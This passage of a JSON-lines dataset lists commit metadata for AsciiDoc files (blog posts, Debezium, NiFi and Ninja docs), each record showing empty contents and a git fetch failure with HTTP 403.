403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2111013ecf079a41998ddeee7a53fcaed7852f88","subject":"More wording tweaks","message":"More wording tweaks\n","repos":"ysb33r\/asciidoctor-gradle-examples,rwinch\/asciidoctor-gradle-examples,sputnik27\/asciidoctor-gradle-examples,achimgrimm\/asciidoctor-gradle-examples,ysb33r\/asciidoctor-gradle-examples,rwinch\/asciidoctor-gradle-examples,achimgrimm\/asciidoctor-gradle-examples,sputnik27\/asciidoctor-gradle-examples","old_file":"asciidoc-to-github-pages-example\/README.adoc","new_file":"asciidoc-to-github-pages-example\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rwinch\/asciidoctor-gradle-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"239799e8499d5a23a542e9451ebc2459b694e85f","subject":"Adding 0.7.3 release announcement","message":"Adding 0.7.3 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-02-15-debezium-0-7-3-released.adoc","new_file":"blog\/2018-02-15-debezium-0-7-3-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4044b3051ee9b9ce020ce95fef7e9163c061a6b6","subject":"Adding 0.7.4 release announcement","message":"Adding 0.7.4 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-03-07-debezium-0-7-4-released.adoc","new_file":"blog\/2018-03-07-debezium-0-7-4-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c93fdd8e0f54a7bc33cb313b4695b89a043c8c4","subject":"Update 2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","message":"Update 2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","new_file":"_posts\/2016-06-17-How-complicated-is-to-truly-learn-the-Streams-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45b694f1f341f31ca36d02bbdd906e090c618e13","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a33821ba3d3c5a6e0064be128af8f4f4c05c719","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 
2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c9834846a8d2c4f1432e7a515fd542dfb1e7bff","subject":"y2b create post Become the unboxer! + Xbox One or PS4?","message":"y2b create post Become the unboxer! + Xbox One or PS4?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-04-Become-the-unboxer--Xbox-One-or-PS4.adoc","new_file":"_posts\/2013-12-04-Become-the-unboxer--Xbox-One-or-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dba7c80e2cdb7589450fec95b91ee699ddf81d20","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95aafe4a3a0994cdc020c16dc5d01eade31bad15","subject":"Update 2017-03-17-iphone-irkit-arduino.adoc","message":"Update 2017-03-17-iphone-irkit-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_file":"_posts\/2017-03-17-iphone-irkit-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f9ad0c81c21c990ac1f9850b872faffec4bab3e","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c966f9ae251bc2f57f8d6f76c010ff364c08e211","subject":"Update 2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","message":"Update 
2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","new_file":"_posts\/2016-06-02-Teaching-a-kid-how-to-write-computer-programs-which-language-I-D-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0735f03d2143a94607984bdf11c4bd1ccd32abf8","subject":"Update 2014-11-18-So-I-made-a-programming-language-Now-what.adoc","message":"Update 2014-11-18-So-I-made-a-programming-language-Now-what.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-11-18-So-I-made-a-programming-language-Now-what.adoc","new_file":"_posts\/2014-11-18-So-I-made-a-programming-language-Now-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"357418465fb4ce13da944f9ae24673cc542594f9","subject":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-Treat-your-POM-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f2469b51bbd86cae7733e5f645f2d450c6634e","subject":"Fix reference to section of BuildConfig","message":"Fix reference to section of BuildConfig\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/builds.adoc","new_file":"dev_guide\/builds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8871a391175db325c61b4c62d67feb64246dad1","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e8022636b98aa907ba6656960ea2929dd82e88c","subject":"self-contained dtc tutorial","message":"self-contained dtc 
tutorial\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/120_self-contained-dtc.adoc","new_file":"src\/docs\/020_tutorial\/120_self-contained-dtc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01b9826da32628c6baa7cfcca0e5cf17f47835f1","subject":"Link 8","message":"Link 8\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3311c32f3e5b405a84af7decfa168f33a250f11b","subject":"Improve the manual documentation","message":"Improve the manual documentation\n","repos":"ilor\/ninja,nico\/ninja,Qix-\/ninja,dabrahams\/ninja,dabrahams\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,mutac\/ninja,dpwright\/ninja,automeka\/ninja,fuchsia-mirror\/third_party-ninja,metti\/ninja,mutac\/ninja,bradking\/ninja,rjogrady\/ninja,automeka\/ninja,colincross\/ninja,sgraham\/ninja,Maratyszcza\/ninja-pypi,lizh06\/ninja,nafest\/ninja,mydongistiny\/ninja,dorgonman\/ninja,kissthink\/ninja,ctiller\/ninja,metti\/ninja,automeka\/ninja,ctiller\/ninja,maruel\/ninja,kimgr\/ninja,purcell\/ninja,metti\/ninja,synaptek\/ninja,sxlin\/dist_ninja,atetubou\/ninja,autopulated\/ninja,moroten\/ninja,mydongistiny\/ninja,dendy\/ninja,liukd\/ninja,purcell\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,nicolasdespres\/ninja,kimgr\/ninja,nafest\/ninja,mgaunard\/ninja,lizh06\/ninja,moroten\/ninja,dorgonman\/ninja,juntalis\/ninja,rjogrady\/ninja,jsternberg\/ninja,juntalis\/ninja,ikarienator\/ninja,yannicklm\/ninja,pck\/ninja,pathscale\/ninja,TheOneRing\/ninja,sxlin\/dist_ninja,Ju2ender\/ninja,ilor\/ninja,TheOneRing\/ninja,rnk\/ninja,mgaunard\/ninja,dpwright\/ninja,moroten\/ninja,pathscale\/ninja,pathscale\/ninja,sgraham\/ninja,atetubou\/ninja,yannicklm\/ninja,drbo\/ninja,glensc\/ninja,nico\/ninja,nickhutchinson\/ninja,TheOneRing\/ninja,autopulated\/ninja,mdempsky\/ninja,Qix-\/ninja,jendrikillner\/ninja,sgraham\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,jimon\/ninja,bmeurer\/ninja,kissthink\/ninja,glensc\/ninja,maruel\/ninja,guiquanz\/ninja,mutac\/ninja,jhanssen\/ninja,hnney\/ninja,yannicklm\/ninja,sorbits\/ninja,sgraham\/ninja,fifoforlifo\/ninja,mdempsky\/ninja,mydongistiny\/ninja,rnk\/ninja,ikarienator\/ninja,guiquanz\/ninja,ndsol\/subninja,syntheticpp\/ninja,guiquanz\/ninja,nicolasdespres\/ninja,Maratyszcza\/ninja-pypi,dpwright\/ninja,nocnokneo\/ninja,ignatenkobrain\/ninja,ThiagoGarciaAlves\/ninja,ninja-build\/ninja,martine\/ninja,ninja-build\/ninja,vvvrrooomm\/ninja,martine\/ninja,nafest\/ninja,ikarienator\/ninja,hnney\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,juntalis\/ninja,metti\/ninja,jimon\/ninja,sorbits\/ninja,autopulated\/ninja,fuchsia-mirror\/third_party-ninja,dendy\/ninja,nafest\/ninja,dendy\/ninja,AoD314\/ninja,dorgonman\/ninja,iwadon\/ninja,bradking\/ninja,Qix-\/ninja,jhanssen\/ninja,jsternberg\/ninja,nocnokneo\/ninja,sxlin\/dist_ninja,fifoforlifo\/ninja,colincross\/ninja,mohamed\/ninja,iwadon\/ninja,glensc\/ninja,pck\/ninja,atetubou\/ninja,rjogrady\/ninja,bmeurer\/ninja,moroten\/ni
nja,jhanssen\/ninja,hnney\/ninja,tfarina\/ninja,mdempsky\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,sxlin\/dist_ninja,kissthink\/ninja,lizh06\/ninja,Qix-\/ninja,fifoforlifo\/ninja,hnney\/ninja,glensc\/ninja,jimon\/ninja,dorgonman\/ninja,liukd\/ninja,iwadon\/ninja,syntheticpp\/ninja,jhanssen\/ninja,yannicklm\/ninja,Maratyszcza\/ninja-pypi,nico\/ninja,nickhutchinson\/ninja,mohamed\/ninja,sorbits\/ninja,ctiller\/ninja,colincross\/ninja,ndsol\/subninja,sorbits\/ninja,ctiller\/ninja,vvvrrooomm\/ninja,ThiagoGarciaAlves\/ninja,syntheticpp\/ninja,colincross\/ninja,drbo\/ninja,iwadon\/ninja,Maratyszcza\/ninja-pypi,AoD314\/ninja,liukd\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,dendy\/ninja,dpwright\/ninja,rnk\/ninja,nico\/ninja,AoD314\/ninja,kimgr\/ninja,AoD314\/ninja,mgaunard\/ninja,purcell\/ninja,ignatenkobrain\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,ilor\/ninja,ndsol\/subninja,kissthink\/ninja,pck\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,dabrahams\/ninja,jsternberg\/ninja,juntalis\/ninja,lizh06\/ninja,jsternberg\/ninja,sxlin\/dist_ninja,mydongistiny\/ninja,martine\/ninja,pathscale\/ninja,rnk\/ninja,nocnokneo\/ninja,jendrikillner\/ninja,purcell\/ninja,maruel\/ninja,dabrahams\/ninja,pck\/ninja,automeka\/ninja,ThiagoGarciaAlves\/ninja,nickhutchinson\/ninja,Ju2ender\/ninja,synaptek\/ninja,jendrikillner\/ninja,mohamed\/ninja,mutac\/ninja,mohamed\/ninja,kimgr\/ninja,syntheticpp\/ninja,jimon\/ninja,bradking\/ninja,ilor\/ninja,ikarienator\/ninja,drbo\/ninja,synaptek\/ninja,liukd\/ninja,bmeurer\/ninja,vvvrrooomm\/ninja,Ju2ender\/ninja,atetubou\/ninja,bradking\/ninja,synaptek\/ninja,ndsol\/subninja,tfarina\/ninja,TheOneRing\/ninja,autopulated\/ninja,nickhutchinson\/ninja,drbo\/ninja,rjogrady\/ninja,mgaunard\/ninja,jendrikillner\/ninja,Ju2ender\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d917f83c4538831550da19ee9c3b31885077963","subject":"y2b create post This Might Give You Faster Internet","message":"y2b create post This Might Give You Faster Internet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-24-This-Might-Give-You-Faster-Internet.adoc","new_file":"_posts\/2016-06-24-This-Might-Give-You-Faster-Internet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6ad9c765dc05878066d8fbc8f395c83a1e0fc10","subject":"Publish 2016-6-27-PHP.adoc","message":"Publish 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHP.adoc","new_file":"2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f20881620ba777c30567c49f7dd34763478ac1b","subject":"Renamed '_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc' to 
'_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc'","message":"Renamed '_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc' to '_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc'","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_file":"_posts\/2017-01-25-Draft-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34d26078cda8c8cf36a1685cdf72e16b488927c6","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa9455f9506ce89d9d0748019e7fd4b8c4b1c68a","subject":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","message":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d5b2203792f1760f3ec7d2ef2f3f6610cfc3641","subject":"document ECMWF GRIB-1 extended complex packing","message":"document ECMWF GRIB-1 extended complex packing\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"docs\/website\/netcdf-java\/reference\/formats\/Grib1Notes.adoc","new_file":"docs\/website\/netcdf-java\/reference\/formats\/Grib1Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"988cd027e9cfa4ed4a90a3de07435e3b90a1a219","subject":"Update 2015-03-16-LGBTQ-in-tech.adoc","message":"Update 2015-03-16-LGBTQ-in-tech.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-03-16-LGBTQ-in-tech.adoc","new_file":"_posts\/2015-03-16-LGBTQ-in-tech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f4223ca449585c115251ee7969d268e6a1eca3","subject":"Update 2015-06-08-A-remplacer-1.adoc","message":"Update 2015-06-08-A-remplacer-1.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_file":"_posts\/2015-06-08-A-remplacer-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"357c6d76b96efa832949c5207e4eaa9a4dddc656","subject":"y2b create post Ultimate Gaming PC Project Episode #2","message":"y2b create post Ultimate Gaming PC Project Episode #2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-16-Ultimate-Gaming-PC-Project-Episode-2.adoc","new_file":"_posts\/2012-07-16-Ultimate-Gaming-PC-Project-Episode-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acabe5ffcb0d47752d151b91cf90fa0337cf746b","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68b7ad78ccb8ee6cd6cad5218fbbd13438085f5f","subject":"NIFI-218: Started Expression Language guide","message":"NIFI-218: Started Expression Language 
guide\n","repos":"jtstorck\/nifi,jskora\/nifi,speddy93\/nifi,peter-gergely-horvath\/nifi,InspurUSA\/nifi,qfdk\/nifi,jfrazee\/nifi,aperepel\/nifi,apsaltis\/nifi,thesolson\/nifi,m-hogue\/nifi,WilliamNouet\/ApacheNiFi,speddy93\/nifi,josephxsxn\/nifi,jjmeyer0\/nifi,thesolson\/nifi,josephxsxn\/nifi,zhengsg\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,apsaltis\/nifi,alopresto\/nifi,WilliamNouet\/nifi,zhengsg\/nifi,thesolson\/nifi,tequalsme\/nifi,zhengsg\/nifi,jfrazee\/nifi,YolandaMDavis\/nifi,MikeThomsen\/nifi,mans2singh\/nifi,mcgilman\/nifi,tequalsme\/nifi,InspurUSA\/nifi,josephxsxn\/nifi,mcgilman\/nifi,ShellyLC\/nifi,trixpan\/nifi,josephxsxn\/nifi,ShellyLC\/nifi,michalklempa\/nifi,alopresto\/nifi,qfdk\/nifi,jfrazee\/nifi,peter-gergely-horvath\/nifi,joewitt\/incubator-nifi,PuspenduBanerjee\/nifi,MikeThomsen\/nifi,InspurUSA\/nifi,jfrazee\/nifi,dlukyanov\/nifi,alopresto\/nifi,ShellyLC\/nifi,aperepel\/nifi,WilliamNouet\/nifi,josephxsxn\/nifi,qfdk\/nifi,jjmeyer0\/nifi,bbende\/nifi,thesolson\/nifi,MikeThomsen\/nifi,pvillard31\/nifi,mattyb149\/nifi,mcgilman\/nifi,joewitt\/incubator-nifi,Xsixteen\/nifi,m-hogue\/nifi,jjmeyer0\/nifi,Wesley-Lawrence\/nifi,mattyb149\/nifi,apsaltis\/nifi,InspurUSA\/nifi,jtstorck\/nifi,peter-gergely-horvath\/nifi,speddy93\/nifi,m-hogue\/nifi,michalklempa\/nifi,mans2singh\/nifi,zhengsg\/nifi,tijoparacka\/nifi,MikeThomsen\/nifi,peter-gergely-horvath\/nifi,michalklempa\/nifi,Xsixteen\/nifi,jtstorck\/nifi,tequalsme\/nifi,jskora\/nifi,tijoparacka\/nifi,trixpan\/nifi,Wesley-Lawrence\/nifi,mcgilman\/nifi,aperepel\/nifi,PuspenduBanerjee\/nifi,dlukyanov\/nifi,mans2singh\/nifi,jjmeyer0\/nifi,mcgilman\/nifi,joewitt\/incubator-nifi,mans2singh\/nifi,trixpan\/nifi,WilliamNouet\/nifi,mattyb149\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,aperepel\/nifi,jtstorck\/nifi,jjmeyer0\/nifi,mans2singh\/nifi,zhengsg\/nifi,tijoparacka\/nifi,ijokarumawak\/nifi,pvillard31\/nifi,m-hogue\/nifi,PuspenduBanerjee\/nifi,mattyb149\/nifi,joetrite\/nifi,pvillard31\/nifi,InspurUSA\/nifi,ijokarumawak\/nifi,tijoparacka\/nifi,michalklempa\/nifi,apsaltis\/nifi,joewitt\/incubator-nifi,patricker\/nifi,dlukyanov\/nifi,m-hogue\/nifi,tequalsme\/nifi,pvillard31\/nifi,YolandaMDavis\/nifi,PuspenduBanerjee\/nifi,pvillard31\/nifi,jtstorck\/nifi,ijokarumawak\/nifi,joetrite\/nifi,trixpan\/nifi,patricker\/nifi,PuspenduBanerjee\/nifi,mcgilman\/nifi,michalklempa\/nifi,MikeThomsen\/nifi,aperepel\/nifi,jskora\/nifi,Wesley-Lawrence\/nifi,MikeThomsen\/nifi,jfrazee\/nifi,MikeThomsen\/nifi,qfdk\/nifi,mans2singh\/nifi,jskora\/nifi,dlukyanov\/nifi,mcgilman\/nifi,jtstorck\/nifi,jfrazee\/nifi,speddy93\/nifi,WilliamNouet\/nifi,WilliamNouet\/ApacheNiFi,Xsixteen\/nifi,pvillard31\/nifi,bbende\/nifi,joetrite\/nifi,qfdk\/nifi,bbende\/nifi,speddy93\/nifi,michalklempa\/nifi,tijoparacka\/nifi,ijokarumawak\/nifi,speddy93\/nifi,joetrite\/nifi,jfrazee\/nifi,jfrazee\/nifi,WilliamNouet\/nifi,patricker\/nifi,peter-gergely-horvath\/nifi,tequalsme\/nifi,alopresto\/nifi,joetrite\/nifi,apsaltis\/nifi,dlukyanov\/nifi,Xsixteen\/nifi,patricker\/nifi,jtstorck\/nifi,Wesley-Lawrence\/nifi,WilliamNouet\/ApacheNiFi,alopresto\/nifi,thesolson\/nifi,joewitt\/incubator-nifi,ShellyLC\/nifi,alopresto\/nifi,joewitt\/incubator-nifi,jjmeyer0\/nifi,apsaltis\/nifi,josephxsxn\/nifi,m-hogue\/nifi,ShellyLC\/nifi,Wesley-Lawrence\/nifi,YolandaMDavis\/nifi,peter-gergely-horvath\/nifi,ijokarumawak\/nifi,jskora\/nifi,YolandaMDavis\/nifi,alopresto\/nifi,bbende\/nifi,bbende\/nifi,trixpan\/nifi,pvillard31\/nifi,patricker\/nifi,WilliamNouet\/ApacheNiFi,aperepel\/nifi,ShellyLC\/nifi,jskora\/nif
